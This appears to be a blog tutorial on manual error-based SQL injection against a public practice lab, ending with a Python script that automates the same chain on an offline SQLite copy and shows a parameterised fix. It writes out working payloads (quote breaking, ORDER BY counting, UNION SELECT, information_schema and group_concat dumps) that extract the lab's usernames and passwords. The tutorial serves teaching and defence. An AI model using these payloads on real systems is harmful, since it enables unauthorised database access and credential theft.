Thursday, December 7, 2023

Web Application Pentesting – Manual SQL Injection With Error Based String Method

SQL injection is a code injection technique in which attacker-controlled input is interpreted as part of a database query, giving the attacker access to the backend database (MySQL, MSSQL, Oracle, etc.). The OWASP Top 10 (2017 release) still lists Injection as A1, its highest-ranked category.

The CWE/SANS Top 25 Most Dangerous Software Errors lists SQL injection as CWE-89, Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), and it held rank 1 in that list.

Detection and exploitation can be automated with a large number of tools available on the internet. Tools do not understand the target the way a human does: reading the errors, reasoning about the backend query and adapting the next request are creative decisions, so I preferred to do this penetration test manually.


NOTE: This walkthrough targets a MySQL backend only. The payloads rely on MySQL-specific behaviour (the "-- " comment sequence sent as --+, the verbose syntax error messages, information_schema, group_concat(), version() and database()), so the same strings will not work unchanged against Oracle or other database engines; each engine has its own comment syntax and metadata views.

SQL Injection ONLINE LAB:

  • Beginners can use the leettime.net SQL Ninja lab to practice SQL injection; the challenge used throughout this article is http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
  • Once the page loads you should see the lab's welcome screen.
  (Screenshot: lab welcome screen)

STEP 1: Breaking the Query

  • Visit the website http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
  • Append a single quote to the id value to check whether the parameter is vulnerable to SQL injection: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
  • If the page now shows the error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1", the quote reached the database unescaped.
  (Screenshot: MySQL syntax error displayed on the page)
  • That confirms the parameter is vulnerable to SQL injection.
  • You have broken the query, and the backend database is leaking its error messages to the attacker. That leak is what makes the error-based method work; a page that swallowed the error would need a blind technique instead.

STEP 2: Copying the Error Statement

  • Copy the SQL error statement into a text editor.
  • Look at the text MySQL quotes in the error: near ''1''' at line 1. The outer pair of quotes is MySQL's; what it could not parse is '1'', i.e. the original quoted value with our extra quote appended.
  (Screenshot: error statement with the injected single quote highlighted)
  • The highlighted single quote is what breaks the backend query.
  • Now put yourself in the developer's position and guess the SQL statement behind the page.
  • A reasonable guess is: SELECT username, password FROM table WHERE id='1'
  • Our extra quote turns it into SELECT username, password FROM table WHERE id='1'' which has an unbalanced quote and fails to parse.
  • Because the injection point sits inside a quoted string and the database reports its errors back to the page, this is called single-quote error-based string injection.

STEP 3: Joining the Query

  • Append --+ to comment out the rest of the statement: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+
  (Screenshot: the page loads normally again)
  • The error disappears because, in MySQL, -- followed by a space starts a comment that runs to the end of the line; the + is URL-decoded to the space MySQL requires, so everything after our quote (including the original closing quote) is commented out.
  • The query is now syntactically valid again with our input spliced into it: the parameter has been broken out of its string, the remainder of the statement has been neutralised, and the injection has been confirmed as single-quote error-based string injection.

STEP 4: Finding the Backend Columns

  • Next, ask the database how many columns the original SELECT returns. ORDER BY with a column position does this: ORDER BY n succeeds while n is within the number of selected columns and errors once it is not.
  • Start with http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+
  (Screenshot: page loads without error for ORDER BY 1)

No SQL error, so the query returns at least one column.

  • Continue with order by 2, order by 3, and so on.
  (Screenshot: page loads without error for ORDER BY 3)

Still no error at ORDER BY 3, so the query selects at least three columns.

  • Check one more with order by 4
  (Screenshot: MySQL error for ORDER BY 4)

This time the database answers with Unknown column '4' in 'order clause', which tells us the SELECT returns exactly 3 columns. Note that this is the column count of the query behind the page, not of any table or of the whole database. This is how you hold a conversation with the database through its error messages.

STEP 5: Finding the Output Column

  • A UNION only works if our SELECT returns the same number of columns as the original one, which is why the count from step 4 matters. Before pulling any data we also need to know which of the 3 columns the page actually renders, since a backend query may select columns the template never displays.
  • Set id to a value that matches no row (-1) so the original query returns nothing, and UNION our own row of placeholder numbers: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union all select 1,2,3 --+
  (Screenshot: page shows Username is: 2)
  • The page prints Username is: 2, so the second column of the result set is the one echoed back. Whatever we put in position 2 of our UNION SELECT will be displayed; that column is our output channel for the rest of the attack.

STEP 6: Finding the Database Name and Version

  • With the output column known, we can ask the database about itself by placing functions such as database() and version() in position 2 of the UNION SELECT.
  (Screenshot: page shows the database name)
  • The page reveals the database name: leettime_761wHole
  • Do the same with version() to read the server version
  (Screenshot: page shows the server version)
  • The page reveals the backend database version: 5.6.36-cll-lve

STEP 7: Dumping Database Tables

  • GROUP_CONCAT() is a MySQL aggregate function that returns a single string made by concatenating the non-NULL values of a group, comma-separated by default. It is useful here because the page renders only one row, so an aggregate lets us squeeze a whole list into that one output column.
  • Use it to list every table in the current database.
  • The metadata comes from information_schema, which describes the objects in the server: information_schema.tables holds one row per table, and filtering on table_schema = database() keeps the list to the current database.
  (Screenshot: page shows the table list)
  • The page dumps the table names: testtable1, user logs, users.

STEP 8: Listing the Columns of the users Table

  • Next, list the columns of the users table the same way, reading column_name from information_schema.columns for that table.
  • The columns of users are id, username, password, user_type and sec_code.
  • Usernames and passwords are the most sensitive of these, so dump them next.

STEP 9: Dumping all Usernames

  • Put group_concat(username) in the output column, selecting from users, to dump every username in one request.
  (Screenshot: page shows the username list)
  • The page dumps the usernames: injector, decompiler, devil hunter, Zen, Zenodermus, grayhat, khan, admin
  • The admin account is the one worth going after.

STEP 10: Dumping all Passwords

  • Now use group_concat(password) from users in the same way.
  (Screenshot: page shows the password list)
  • The page dumps the passwords: Khan, hacktract, dante, sec-idiots, security-i, hacker, haxor, sadmin
  • Both dumps walk the users table in the same order, so matching positions gives admin's password as sadmin. Relying on position is fragile, though; concatenating username and password in the same group_concat() call makes each pair unambiguous. Happy hacking!
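The ten steps above as one runnable chain. This is an added example, not the lab's or the article's own code: it stands up an in-memory SQLite database with constructed users rows and a PHP-style concatenated query in place of the real MySQL lab so that it runs offline, reads id from the query string the way the page does, and then sends the article's payloads in order (the lone quote, ORDER BY, UNION ALL SELECT with id=-1, and group_concat() through the reflected column). The table layout, the reflected column and the vulnerable_page/fixed_page functions are assumptions made for the example; where SQLite has no MySQL equivalent, the comment gives the MySQL form (information_schema, version(), database()). A parameterised version of the page is included to show that the same payloads then do nothing.

```python
"""Offline stand-in for the leettime lab (added example, not the lab's code).

SQLite replaces MySQL so the script runs without a server; the payload strings
are the article's, and the few engine-specific pieces (sqlite_master instead of
information_schema, sqlite_version() instead of version()) are marked below.
"""
import sqlite3
from urllib.parse import parse_qs

# Constructed sample rows: names echo the article's dump, passwords are made up.
SEED_USERS = [
    (1, "injector", "khan", "user", "A1"),
    (2, "grayhat", "haxor", "user", "B2"),
    (3, "admin", "sadmin", "admin", "C3"),
]


def setup_db():
    """Create the two tables the lab dump reveals and seed users (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT,"
                 " user_type TEXT, sec_code TEXT)")
    conn.execute("CREATE TABLE testtable1 (id INTEGER, note TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", SEED_USERS)
    return conn


def vulnerable_page(conn, query_string):
    """Model of basic_ch1.php: id is read from the query string and pasted into
    the SQL text. parse_qs turns '+' into a space, which is why '--+' arrives
    as '-- ' (the comment form MySQL insists on). Errors are echoed, as the lab does."""
    user_id = parse_qs(query_string, keep_blank_values=True).get("id", [""])[0]
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return {"error": str(exc)}
    # The template prints only the second column ("Username is: ...").
    return {} if row is None else {"username": str(row[1])}


def fixed_page(conn, query_string):
    """Same page with a bound parameter: the input is data, never parsed as SQL."""
    user_id = parse_qs(query_string, keep_blank_values=True).get("id", [""])[0]
    row = conn.execute("SELECT id, username, password FROM users WHERE id=?",
                       (user_id,)).fetchone()
    return {} if row is None else {"username": str(row[1])}


# --- the attack chain, one function per step of the article -----------------

def is_injectable(conn):
    """Step 1: a lone quote must produce a database error."""
    return "error" in vulnerable_page(conn, "id=1'")


def count_columns(conn, limit=20):
    """Step 4: ORDER BY n succeeds until n exceeds the SELECT's column count."""
    for n in range(1, limit + 1):
        if "error" in vulnerable_page(conn, f"id=1' order by {n}--+"):
            return n - 1
    return None


def union_row(conn, ncols):
    """Step 5: id=-1 empties the original result so our placeholder row is shown."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    return vulnerable_page(conn, f"id=-1' union all select {markers}--+")


def extract(conn, expr, from_clause="", ncols=3, reflected=2):
    """Steps 6-10: put an expression in the reflected column and read it back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[reflected - 1] = expr
    payload = f"id=-1' union all select {','.join(cols)} {from_clause}--+"
    return vulnerable_page(conn, payload).get("username")


def run_chain(conn):
    """Run every step and return what the page leaked at each one."""
    ncols = count_columns(conn)
    reflected = int(union_row(conn, ncols)["username"])

    def dump(expr, from_clause=""):
        return extract(conn, expr, from_clause, ncols, reflected)

    return {
        "injectable": is_injectable(conn),
        "columns": ncols,
        "reflected": reflected,
        # MySQL: version(); database() has no SQLite counterpart.
        "version": dump("sqlite_version()"),
        # MySQL: group_concat(table_name) from information_schema.tables
        #        where table_schema=database()
        "tables": dump("group_concat(name)", "from sqlite_master where type='table'"),
        # MySQL: group_concat(column_name) from information_schema.columns
        #        where table_name='users'
        "user_columns": dump("group_concat(name)", "from pragma_table_info('users')"),
        # Pair each username with its password so the mapping is unambiguous.
        "credentials": dump("group_concat(username||':'||password)", "from users"),
    }


if __name__ == "__main__":
    db = setup_db()
    for key, value in run_chain(db).items():
        print(f"{key}: {value}")
    print("fixed page:", fixed_page(db, "id=-1' union all select 1,2,3--+"))
```

Running the script prints one line per step; the only thing separating vulnerable_page from fixed_page is string concatenation versus a bound parameter, which is the fix for every payload on this page at once. The --+ trick is visible in vulnerable_page: the + is decoded to a space before the text reaches the SQL engine, exactly as a PHP $_GET lookup would do it.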
